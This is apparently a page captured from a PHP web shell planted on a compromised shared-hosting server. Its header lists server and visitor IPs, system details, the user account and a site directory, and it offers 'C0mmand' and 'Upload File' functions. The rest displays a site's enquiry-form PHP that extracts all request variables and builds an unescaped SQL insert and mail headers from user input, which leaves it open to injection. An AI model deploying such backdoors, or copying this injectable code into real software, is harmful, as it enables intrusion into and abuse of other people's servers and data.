Server IP : 103.53.40.154 / Your IP : 18.118.193.28 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/aviationpestcontrolcorporation.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php if(isset($_REQUEST['EnqSubmit'])){ @extract($_REQUEST); if($_SESSION["code"]!=$_REQUEST['captcha']){ $clrerr="msgNegative"; set_session_msg("The Security Code does not match !"); }else{ $sql="insert into tbl_enquiry set enquiry_name='$enquiry_nam', enquiry_mobile='$enquiry_mobil', enquiry_email='$enquiry_emai', enquiry_detail='$enquiry_detai', enquiry_source='Enquiry', enquiry_add_date=now()"; db_query($sql); ///////////////****** Mailer to client start here **********************////////////// $hostName = $_SERVER['HTTP_HOST']; $msgmail="<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'> <html xmlns='http://www.w3.org/1999/xhtml'> <head> <meta http-equiv='Content-Type' content='text/html; charset=iso-8859-1' /> <title>TradeKeyIndia.com-Largest B2B Portal In India</title> </head> <body> <table align='center' cellSpacing='0' cellPadding='0' width='87%' border='1' style='border:1px solid #e61938'> <tbody> <tr> <td vAlign='top' style='background-color:#e61938; padding:10px;font-family:Verdana, Arial, Helvetica, sans-serif; font-size:16px; color:#ffffff; text-align:center; font-weight:bold;' colspan='3' >Enquiry From $hostName</td> </tr> <tr> <td width='30%' vAlign='top' style='font-family:Verdana, Arial, Helvetica, sans-serif; font-size:14px; color:#003366; background-color:#F9E2DD;padding:10px;' ><strong>Name</strong> </td> <td vAlign='top' width='70%' style='font-family:Verdana, Arial, Helvetica, sans-serif;padding:10px;'>$enquiry_nam</td> </tr> <tr> <td vAlign='top' style='font-family:Verdana, Arial, Helvetica, sans-serif; font-size:14px; color:#003366; background-color:#F9E2DD;padding:10px;' ><strong>Mobile </strong> </td> <td vAlign='top' style='font-family:Verdana, Arial, Helvetica, sans-serif;padding:10px;'>$enquiry_mobil</td> </tr> <tr> <td vAlign='top' style='font-family:Verdana, Arial, Helvetica, sans-serif; font-size:14px; color:#003366; background-color:#F9E2DD;padding:10px;' ><strong>Email-Id</strong> </td> <td vAlign='top' style='font-family:Verdana, Arial, Helvetica, sans-serif;padding:10px;'>$enquiry_emai</td> </tr> <tr> <td vAlign='top' style='font-family:Verdana, Arial, Helvetica, sans-serif; font-size:14px; color:#003366; background-color:#F9E2DD;padding:10px;' ><strong>Detail </strong> </td> <td vAlign='top' style='font-family:Verdana, Arial, Helvetica, sans-serif;padding:10px;'>$enquiry_detai</td> </tr> </tbody> </table> </body> </html>"; $toEmail = $compDATA['admin_email']; //$toEmail="arif.tradekeyindia@gmail.com"; $subject = "Enquiry from $hostName"; $from="$enquiry_emai"; $Headers1 = "From: $enquiry_nam<$from>\n"; $Headers1 .= "X-Mailer: PHP/". phpversion(); $Headers1 .= "X-Priority: 3 \n"; $Headers1 .= "MIME-version: 1.0\n"; $Headers1 .= "Content-Type: text/html; charset=iso-8859-1\n"; @mail("$toEmail", "$subject", "$msgmail","$Headers1","-fenquiry@tradekeyindia.com"); //@mail("amitabh.tradekeyindia@gmail.com", "Subject", "Msg1","$Headers1","-fenquiry@tradekeyindia.com"); $toEmail."<br>"; ///////////////****** Mailer to client end here **********************////////////// ///////////////// Mail To Admin ////////////////////////////////// $mail_to_admin="client_enquiry@tradekeyindia.com"; //$mail_to_admin="arif.tradekeyindia@gmail.com"; $sub_admin="Business Enquiry From $hostName"; $mail_admin_body = "$msgmail"; $sender_admin =$enquiry_emai; $headers_admin = "MIME-Version: 1.0" . "\r\n"; $headers_admin .= "Content-type: text/html; charset=iso-8859-1" . "\r\n"; $headers_admin .= "from: ".$sender_admin."\n"; if($enquiry_emai){ @mail($mail_to_admin,$sub_admin,$mail_admin_body,$headers_admin); //header("Location:thanks.html"); } ///////////////// Mail To Admin End////////////////////////////////// $clrerr="msgPositive"; set_session_msg("Enquiry form submitted successfully. We will contact you soon."); // header("Location:$site_url/enquiry.html"); // exit; } } ?> <script type="text/javascript"> function EnqValidation(){ function trim(str){ return str.replace(/^\s*|\s*$/g,''); } if(trim(document.getElementById('enquiry_nam').value)==0){ alert("Enter Your Name !"); document.getElementById('enquiry_nam').focus(); return false; } if (!document.getElementById('enquiry_nam').value.match(/^[a-zA-Z-,]+(\s{0,1}[a-zA-Z-, ])*$/)){ alert("Please enter only alphabets !"); document.getElementById('enquiry_nam').value=''; document.getElementById('enquiry_nam').focus(); return false; } var mobno=trim(document.getElementById('enquiry_mobil').value); if(trim(document.getElementById('enquiry_mobil').value)==0){ alert("Enter your mobile no.!"); document.getElementById('enquiry_mobil').focus(); return false; } if(isNaN(document.getElementById('enquiry_mobil').value)){ alert("Mobile no. should be no.!"); document.getElementById('enquiry_mobil').focus(); return false; } if(mobno.length < 10){ alert("Mobile no. should be 10 digit long !"); document.getElementById('enquiry_mobil').focus(); return false; } var email=trim(document.getElementById('enquiry_emai').value); var mailformat = /^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/; if(email=='') { alert('Please Enter Email Id'); document.getElementById('enquiry_emai').focus(); return false; }else if(!email.match(mailformat)){ alert("You have entered an invalid email address!"); document.getElementById('enquiry_emai').focus(); return false; } if(trim(document.getElementById('enquiry_detai').value)==0){ alert("Enter your enquiry detail !"); document.getElementById('enquiry_detai').focus(); return false; } if(trim(document.getElementById('security_cod').value)==0){ alert("Enter security code !"); document.getElementById('security_cod').focus(); return false; } } </script>